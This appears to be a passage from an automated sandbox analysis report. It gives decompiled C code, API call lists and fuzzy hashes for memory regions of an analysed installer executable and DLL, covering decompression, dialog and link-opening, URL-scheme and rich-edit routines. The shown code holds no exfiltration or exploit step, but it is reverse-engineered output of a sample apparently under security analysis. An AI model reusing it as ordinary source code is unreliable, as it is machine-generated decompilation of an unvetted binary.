                                      				signed int _t166;
                                      				signed int _t168;
                                      				intOrPtr _t175;
                                      				signed int _t181;
                                      				void* _t182;
                                      				intOrPtr _t183;
                                      				signed int* _t184;
                                      				signed int _t186;
                                      				signed int _t187;
                                      				signed int* _t189;
                                      				signed int _t190;
                                      				intOrPtr* _t191;
                                      				intOrPtr _t192;
                                      				signed int _t193;
                                      				signed int _t195;
                                      				signed int _t200;
                                      				signed int _t205;
                                      				void* _t207;
                                      				short _t208;
                                      				signed char _t222;
                                      				signed int _t224;
                                      				signed int _t225;
                                      				signed int* _t232;
                                      				signed int _t233;
                                      				signed int _t234;
                                      				void* _t235;
                                      				signed int _t236;
                                      				signed int _t244;
                                      				signed int _t246;
                                      				signed int _t251;
                                      				signed int _t254;
                                      				signed int _t256;
                                      				signed int _t259;
                                      				signed int _t262;
                                      				void* _t263;
                                      				void* _t264;
                                      				signed int _t267;
                                      				intOrPtr _t269;
                                      				intOrPtr _t271;
                                      				signed int _t274;
                                      				intOrPtr* _t275;
                                      				unsigned int _t276;
                                      				void* _t277;
                                      				signed int _t278;
                                      				intOrPtr* _t279;
                                      				signed int _t281;
                                      				intOrPtr _t282;
                                      				intOrPtr _t283;
                                      				signed int* _t284;
                                      				signed int _t286;
                                      				signed int _t287;
                                      				signed int _t288;
                                      				signed int _t296;
                                      				signed int* _t297;
                                      				intOrPtr _t298;
                                      				void* _t299;
                                      
                                      				_t278 = _a8;
                                      				_t187 = 0x10;
                                      				memset( &_v116, 0, _t187 << 2);
                                      				_t189 = _a4;
                                      				_t233 = _t278;
                                      				do {
                                      					_t166 =  *_t189;
                                      					_t189 =  &(_t189[1]);
                                      					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                      					_t233 = _t233 - 1;
                                      				} while (_t233 != 0);
                                      				if(_v116 != _t278) {
                                      					_t279 = _a28;
                                      					_t267 =  *_t279;
                                      					_t190 = 1;
                                      					_a28 = _t267;
                                      					_t234 = 0xf;
                                      					while(1) {
                                      						_t168 = 0;
                                      						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                      							break;
                                      						}
                                      						_t190 = _t190 + 1;
                                      						if(_t190 <= _t234) {
                                      							continue;
                                      						}
                                      						break;
                                      					}
                                      					_v8 = _t190;
                                      					if(_t267 < _t190) {
                                      						_a28 = _t190;
                                      					}
                                      					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                      						_t234 = _t234 - 1;
                                      						if(_t234 != 0) {
                                      							continue;
                                      						}
                                      						break;
                                      					}
                                      					_v28 = _t234;
                                      					if(_a28 > _t234) {
                                      						_a28 = _t234;
                                      					}
                                      					 *_t279 = _a28;
                                      					_t181 = 1 << _t190;
                                      					while(_t190 < _t234) {
                                      						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                      						if(_t182 < 0) {
                                      							L64:
                                      							return _t168 | 0xffffffff;
                                      						}
                                      						_t190 = _t190 + 1;
                                      						_t181 = _t182 + _t182;
                                      					}
                                      					_t281 = _t234 << 2;
                                      					_t191 = _t299 + _t281 - 0x70;
                                      					_t269 =  *_t191;
                                      					_t183 = _t181 - _t269;
                                      					_v52 = _t183;
                                      					if(_t183 < 0) {
                                      						goto L64;
                                      					}
                                      					_v176 = _t168;
                                      					 *_t191 = _t269 + _t183;
                                      					_t192 = 0;
                                      					_t235 = _t234 - 1;
                                      					if(_t235 == 0) {
                                      						L21:
                                      						_t184 = _a4;
                                      						_t271 = 0;
                                      						do {
                                      							_t193 =  *_t184;
                                      							_t184 =  &(_t184[1]);
                                      							if(_t193 != _t168) {
                                      								_t232 = _t299 + _t193 * 4 - 0xb0;
                                      								_t236 =  *_t232;
                                      								 *((intOrPtr*)(0x42cdf0 + _t236 * 4)) = _t271;
                                      								 *_t232 = _t236 + 1;
                                      							}
                                      							_t271 = _t271 + 1;
                                      						} while (_t271 < _a8);
                                      						_v16 = _v16 | 0xffffffff;
                                      						_v40 = _v40 & 0x00000000;
                                      						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                      						_t195 = _v8;
                                      						_t186 =  ~_a28;
                                      						_v12 = _t168;
                                      						_v180 = _t168;
                                      						_v36 = 0x42cdf0;
                                      						_v240 = _t168;
                                      						if(_t195 > _v28) {
                                      							L62:
                                      							_t168 = 0;
                                      							if(_v52 == 0 || _v28 == 1) {
                                      								return _t168;
                                      							} else {
                                      								goto L64;
                                      							}
                                      						}
                                      						_v44 = _t195 - 1;
                                      						_v32 = _t299 + _t195 * 4 - 0x70;
                                      						do {
                                      							_t282 =  *_v32;
                                      							if(_t282 == 0) {
                                      								goto L61;
                                      							}
                                      							while(1) {
                                      								_t283 = _t282 - 1;
                                      								_t200 = _a28 + _t186;
                                      								_v48 = _t283;
                                      								_v24 = _t200;
                                      								if(_v8 <= _t200) {
                                      									goto L45;
                                      								}
                                      								L31:
                                      								_v20 = _t283 + 1;
                                      								do {
                                      									_v16 = _v16 + 1;
                                      									_t296 = _v28 - _v24;
                                      									if(_t296 > _a28) {
                                      										_t296 = _a28;
                                      									}
                                      									_t222 = _v8 - _v24;
                                      									_t254 = 1 << _t222;
                                      									if(1 <= _v20) {
                                      										L40:
                                      										_t256 =  *_a36;
                                      										_t168 = 1 << _t222;
                                      										_v40 = 1;
                                      										_t274 = _t256 + 1;
                                      										if(_t274 > 0x5a0) {
                                      											goto L64;
                                      										}
                                      									} else {
                                      										_t275 = _v32;
                                      										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                      										if(_t222 >= _t296) {
                                      											goto L40;
                                      										}
                                      										while(1) {
                                      											_t222 = _t222 + 1;
                                      											if(_t222 >= _t296) {
                                      												goto L40;
                                      											}
                                      											_t275 = _t275 + 4;
                                      											_t264 = _t263 + _t263;
                                      											_t175 =  *_t275;
                                      											if(_t264 <= _t175) {
                                      												goto L40;
                                      											}
                                      											_t263 = _t264 - _t175;
                                      										}
                                      										goto L40;
                                      									}
                                      									_t168 = _a32 + _t256 * 4;
                                      									_t297 = _t299 + _v16 * 4 - 0xec;
                                      									 *_a36 = _t274;
                                      									_t259 = _v16;
                                      									 *_t297 = _t168;
                                      									if(_t259 == 0) {
                                      										 *_a24 = _t168;
                                      									} else {
                                      										_t276 = _v12;
                                      										_t298 =  *((intOrPtr*)(_t297 - 4));
                                      										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                      										_a5 = _a28;
                                      										_a4 = _t222;
                                      										_t262 = _t276 >> _t186;
                                      										_a6 = (_t168 - _t298 >> 2) - _t262;
                                      										 *(_t298 + _t262 * 4) = _a4;
                                      									}
                                      									_t224 = _v24;
                                      									_t186 = _t224;
                                      									_t225 = _t224 + _a28;
                                      									_v24 = _t225;
                                      								} while (_v8 > _t225);
                                      								L45:
                                      								_t284 = _v36;
                                      								_a5 = _v8 - _t186;
                                      								if(_t284 < 0x42cdf0 + _a8 * 4) {
                                      									_t205 =  *_t284;
                                      									if(_t205 >= _a12) {
                                      										_t207 = _t205 - _a12 + _t205 - _a12;
                                      										_v36 =  &(_v36[1]);
                                      										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                      										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                      									} else {
                                      										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                      										_t208 =  *_t284;
                                      										_v36 =  &(_t284[1]);
                                      									}
                                      									_a6 = _t208;
                                      								} else {
                                      									_a4 = 0xc0;
                                      								}
                                      								_t286 = 1 << _v8 - _t186;
                                      								_t244 = _v12 >> _t186;
                                      								while(_t244 < _v40) {
                                      									 *(_t168 + _t244 * 4) = _a4;
                                      									_t244 = _t244 + _t286;
                                      								}
                                      								_t287 = _v12;
                                      								_t246 = 1 << _v44;
                                      								while((_t287 & _t246) != 0) {
                                      									_t287 = _t287 ^ _t246;
                                      									_t246 = _t246 >> 1;
                                      								}
                                      								_t288 = _t287 ^ _t246;
                                      								_v20 = 1;
                                      								_v12 = _t288;
                                      								_t251 = _v16;
                                      								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                      									L60:
                                      									if(_v48 != 0) {
                                      										_t282 = _v48;
                                      										_t283 = _t282 - 1;
                                      										_t200 = _a28 + _t186;
                                      										_v48 = _t283;
                                      										_v24 = _t200;
                                      										if(_v8 <= _t200) {
                                      											goto L45;
                                      										}
                                      										goto L31;
                                      									}
                                      									break;
                                      								} else {
                                      									goto L58;
                                      								}
                                      								do {
                                      									L58:
                                      									_t186 = _t186 - _a28;
                                      									_t251 = _t251 - 1;
                                      								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                      								_v16 = _t251;
                                      								goto L60;
                                      							}
                                      							L61:
                                      							_v8 = _v8 + 1;
                                      							_v32 = _v32 + 4;
                                      							_v44 = _v44 + 1;
                                      						} while (_v8 <= _v28);
                                      						goto L62;
                                      					}
                                      					_t277 = 0;
                                      					do {
                                      						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                      						_t277 = _t277 + 4;
                                      						_t235 = _t235 - 1;
                                      						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                      					} while (_t235 != 0);
                                      					goto L21;
                                      				}
                                      				 *_a24 =  *_a24 & 0x00000000;
                                      				 *_a28 =  *_a28 & 0x00000000;
                                      				return 0;
                                      			}


                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9c33ce0fc1a3953d6a0fdc535813205e5f0e8e75a81554b33e1599d899765756
                                      • Instruction ID: 233014ff28be9fca5e40c1aeee1244862099a57bf12043c09a7623bfee50ec27
                                      • Opcode Fuzzy Hash: 9c33ce0fc1a3953d6a0fdc535813205e5f0e8e75a81554b33e1599d899765756
                                      • Instruction Fuzzy Hash: D0C13B71A00259CBCF14DF68C4905EEB7B2FF99314F26826AD856B7380D734A952CF94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e07f1f685b7678dabf478a0372837320e52790d716c8f4746af70269fbe044e1
                                      • Instruction ID: 49b4755438ab4d8111c3a1aaf7cd74036fa9e8587b46128106551c2c230e5c6e
                                      • Opcode Fuzzy Hash: e07f1f685b7678dabf478a0372837320e52790d716c8f4746af70269fbe044e1
                                      • Instruction Fuzzy Hash: B9B1241485D2EDADCB06CBF945647FCBFB05E2A102F4841CAE4E5E6243C13A938EDB21
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a50d93217743a047cafb7f1e34b36398fa724113789ff6e9b9acdd2a43a919f5
                                      • Instruction ID: 7be49e31fe22976ccc5b55604b8cfd687df9973143a68804b79f5c353f6fca13
                                      • Opcode Fuzzy Hash: a50d93217743a047cafb7f1e34b36398fa724113789ff6e9b9acdd2a43a919f5
                                      • Instruction Fuzzy Hash: A6B1025485D2EDADCB06CBF945607FCBFB05D2A102F4845CAE0E5E6283C53A938EDB21
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
                                      • Instruction ID: ba8d0d9fb4df3a950d7502f24f35878e0de78a1196af78e9498ea0f629eb56fc
                                      • Opcode Fuzzy Hash: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
                                      • Instruction Fuzzy Hash: 0A11C239A01119AFCB10DBA9E8889EEF7FEEF55690BA100A5E805D3310E770DE41C660
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
                                      • Instruction ID: c39fbee629e3b25723361ae6a02ff610ea9980670189e7066da88d458ebc28b3
                                      • Opcode Fuzzy Hash: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
                                      • Instruction Fuzzy Hash: 20E06D397605059F8B44CBA8D881D55B3F4EB18320B504290FC15C73A0F734FE009650
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                      • Instruction ID: 301434674d526d08e336034e213995b70ac642decfab649642bafa51127c4dad
                                      • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                      • Instruction Fuzzy Hash: ABE08C3A311550ABC362CB29E484C82F3FAEB982B17A6486AEC59D3B11E730FC01C650
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                      • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                      • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                      • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID: file:$file:$ftp:$ftp:$gopher:$gopher:$http:$http:$https:$https:$mailto:$mailto:$news:$news:$nntp:$nntp:$prospero:$prospero:$telnet:$telnet:$wais:$wais:$www.$www.
                                      • API String ID: 2931989736-3063889326
                                      • Opcode ID: 10494f7b14621bab5a5444976b80f5e839e8e90054fa884e4ba03b12bcab5166
                                      • Instruction ID: fa2b97cb6725e30e52d5af7a2f7ec8eb6098a6d4e11bfc0a15ccf9cf1fe24cb3
                                      • Opcode Fuzzy Hash: 10494f7b14621bab5a5444976b80f5e839e8e90054fa884e4ba03b12bcab5166
                                      • Instruction Fuzzy Hash: 86B1C6B9D00229CBEB14CF68D981BDDB7B1FB58300F6081AAE909E3355E7306A95CF55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E00403E25(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                      				char* _v8;
                                      				signed int _v12;
                                      				void* _v16;
                                      				struct HWND__* _t52;
                                      				intOrPtr _t71;
                                      				intOrPtr _t85;
                                      				long _t86;
                                      				int _t98;
                                      				struct HWND__* _t99;
                                      				signed int _t100;
                                      				intOrPtr _t107;
                                      				intOrPtr _t109;
                                      				int _t110;
                                      				signed int* _t112;
                                      				signed int _t113;
                                      				char* _t114;
                                      				CHAR* _t115;
                                      
                                      				if(_a8 != 0x110) {
                                      					if(_a8 != 0x111) {
                                      						L11:
                                      						if(_a8 != 0x4e) {
                                      							if(_a8 == 0x40b) {
                                      								 *0x429fb8 =  *0x429fb8 + 1;
                                      							}
                                      							L25:
                                      							_t110 = _a16;
                                      							L26:
                                      							return E00403D44(_a8, _a12, _t110);
                                      						}
                                      						_t52 = GetDlgItem(_a4, 0x3e8);
                                      						_t110 = _a16;
                                      						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                      							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                      							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                      							_v12 = _t100;
                                      							_v16 = _t109;
                                      							_v8 = 0x42db00;
                                      							if(_t100 - _t109 < 0x800) {
                                      								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                      								SetCursor(LoadCursorA(0, 0x7f02));
                                      								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
                                      								SetCursor(LoadCursorA(0, 0x7f00));
                                      								_t110 = _a16;
                                      							}
                                      						}
                                      						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                      							goto L26;
                                      						} else {
                                      							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                      								SendMessageA( *0x42eb68, 0x111, 1, 0);
                                      							}
                                      							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                      								SendMessageA( *0x42eb68, 0x10, 0, 0);
                                      							}
                                      							return 1;
                                      						}
                                      					}
                                      					if(_a12 >> 0x10 != 0 ||  *0x429fb8 != 0) {
                                      						goto L25;
                                      					} else {
                                      						_t112 =  *0x4297a8 + 0x14;
                                      						if(( *_t112 & 0x00000020) == 0) {
                                      							goto L25;
                                      						}
                                      						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                      						E00403CFF(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                      						E004040B0();
                                      						goto L11;
                                      					}
                                      				}
                                      				_t98 = _a16;
                                      				_t113 =  *(_t98 + 0x30);
                                      				if(_t113 < 0) {
                                      					_t107 =  *0x42e33c; // 0x7278ea
                                      					_t113 =  *(_t107 - 4 + _t113 * 4);
                                      				}
                                      				_t71 =  *0x42eb98; // 0x725d88
                                      				_push( *((intOrPtr*)(_t98 + 0x34)));
                                      				_t114 = _t113 + _t71;
                                      				_push(0x22);
                                      				_a16 =  *_t114;
                                      				_v12 = _v12 & 0x00000000;
                                      				_t115 = _t114 + 1;
                                      				_v16 = _t115;
                                      				_v8 = E00403DF1;
                                      				E00403CDD(_a4);
                                      				_push( *((intOrPtr*)(_t98 + 0x38)));
                                      				_push(0x23);
                                      				E00403CDD(_a4);
                                      				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                      				E00403CFF( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                      				_t99 = GetDlgItem(_a4, 0x3e8);
                                      				E00403D12(_t99);
                                      				SendMessageA(_t99, 0x45b, 1, 0);
                                      				_t85 =  *0x42eb70; // 0x720250
                                      				_t86 =  *(_t85 + 0x68);
                                      				if(_t86 < 0) {
                                      					_t86 = GetSysColor( ~_t86);
                                      				}
                                      				SendMessageA(_t99, 0x443, 0, _t86);
                                      				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                      				 *0x428f9c =  *0x428f9c & 0x00000000;
                                      				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                      				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                      				 *0x429fb8 =  *0x429fb8 & 0x00000000;
                                      				return 0;
                                      			}





















                                      APIs
                                      • CheckDlgButton.USER32 ref: 00403EB0
                                      • GetDlgItem.USER32 ref: 00403EC4
                                      • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403EE2
                                      • GetSysColor.USER32(?), ref: 00403EF3
                                      • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403F02
                                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403F11
                                      • lstrlenA.KERNEL32(?), ref: 00403F1B
                                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403F29
                                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00403F38
                                      • GetDlgItem.USER32 ref: 00403F9B
                                      • SendMessageA.USER32(00000000), ref: 00403F9E
                                      • GetDlgItem.USER32 ref: 00403FC9
                                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404009
                                      • LoadCursorA.USER32 ref: 00404018
                                      • SetCursor.USER32(00000000), ref: 00404021
                                      • ShellExecuteA.SHELL32(0000070B,open,0042DB00,00000000,00000000,00000001), ref: 00404034
                                      • LoadCursorA.USER32 ref: 00404041
                                      • SetCursor.USER32(00000000), ref: 00404044
                                      • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404070
                                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404084
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                      • String ID: N$hqliygqis$open$xr
                                      • API String ID: 3615053054-3972903526
                                      • Opcode ID: 3195d29b63b907abe7959c186dfd862ee6b367c2438cb1dc7bf172a45b8d0b96
                                      • Instruction ID: ff75cf5183ce2723ba3e9af3fd3b1123c83c1709a93184edc862a5803e63a157
                                      • Opcode Fuzzy Hash: 3195d29b63b907abe7959c186dfd862ee6b367c2438cb1dc7bf172a45b8d0b96
                                      • Instruction Fuzzy Hash: 3861CEB1A40209BFEB109F60CD45F6A7B69EB44715F10843AFB05BA2D1C7B8AD51CF98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 75%
                                      			E1000BBE0(void* __ebx, void* __edi, struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20) {
                                      				struct HWND__** _v8;
                                      				struct HWND__* _v12;
                                      				struct HWND__* _v16;
                                      				int _v20;
                                      				int _v24;
                                      				long _v28;
                                      				struct HDC__* _v32;
                                      				int _v36;
                                      				signed int _v40;
                                      				signed int _v44;
                                      				char _v48;
                                      				long _v52;
                                      				signed int _v56;
                                      				void* _v60;
                                      				struct HDC__* _v64;
                                      				struct HWND__* _v108;
                                      				struct HWND__* _v112;
                                      				int _v116;
                                      				struct tagPAINTSTRUCT _v128;
                                      				struct tagRECT _v144;
                                      				struct HWND__** _t391;
                                      				void* _t399;
                                      				void* _t401;
                                      				void* _t407;
                                      
                                      				_t398 = __edi;
                                      				_t288 = __ebx;
                                      				_v28 = 0;
                                      				0x10000000("enter hwnd %p msg %04x (%s) %lx %lx, unicode %d\n", _a4, _a8, E1000B6A0(_a8), _a12, _a16, _a20);
                                      				_t401 = _t399 + 0x20;
                                      				_v8 = GetWindowLongW(_a4, 0);
                                      				if(_v8 != 0) {
                                      					_v36 = _a8;
                                      					if(_v36 > 0xcf) {
                                      						if(_v36 == 0x44d) {
                                      							_v56 = 0x14019c0;
                                      							_v28 = E10001640(__ebx, __edi, _v8, _a8, _a12, _a16, _a20,  &_v48);
                                      							_v44 = GetWindowLongW(_a4, 0xfffffff0);
                                      							_v44 =  !_v56 & _v44 | _v28 & _v56;
                                      							SetWindowLongW(_a4, 0xfffffff0, _v44);
                                      							return _v28;
                                      						}
                                      						L30:
                                      						_v28 = E10001640(_t288, _t398, _v8, _a8, _a12, _a16, _a20,  &_v48);
                                      						if(_v48 == 1) {
                                      							_v28 = DefWindowProcW(_a4, _a8, _a12, _a16);
                                      						}
                                      						0x10000000("exit hwnd %p msg %04x (%s) %lx %lx, unicode %d -> %lu\n", _a4, _a8, E1000B6A0(_a8), _a12, _a16, _a20, _v28);
                                      						return _v28;
                                      					}
                                      					if(_v36 == 0xcf) {
                                      						_v28 = E10001640(__ebx, __edi, _v8, _a8, _a12, _a16, _a20,  &_v48);
                                      						_v40 = GetWindowLongW(_a4, 0xfffffff0);
                                      						_v40 = _v40 & 0xfffff7ff;
                                      						if(_a12 != 0) {
                                      							_v40 = _v40 | 0x00000800;
                                      						}
                                      						SetWindowLongW(_a4, 0xfffffff0, _v40);
                                      						return _v28;
                                      					}
                                      					if(_v36 == 0xf) {
                                      						0x10000000(_v8);
                                      						_t407 = _t401 + 4;
                                      						_v32 = BeginPaint( *_v8,  &_v128);
                                      						if(_v8[4] == 0) {
                                      							L13:
                                      							_push(0x400);
                                      							_push(_v8);
                                      							E10005000(_t243);
                                      							_t407 = _t407 + 8;
                                      							L14:
                                      							_v60 = SelectObject(_v32, _v8[0x14]);
                                      							if(_v116 < _v8[0x12a]) {
                                      								_v24 = _v128.rcPaint;
                                      								_v20 = _v116;
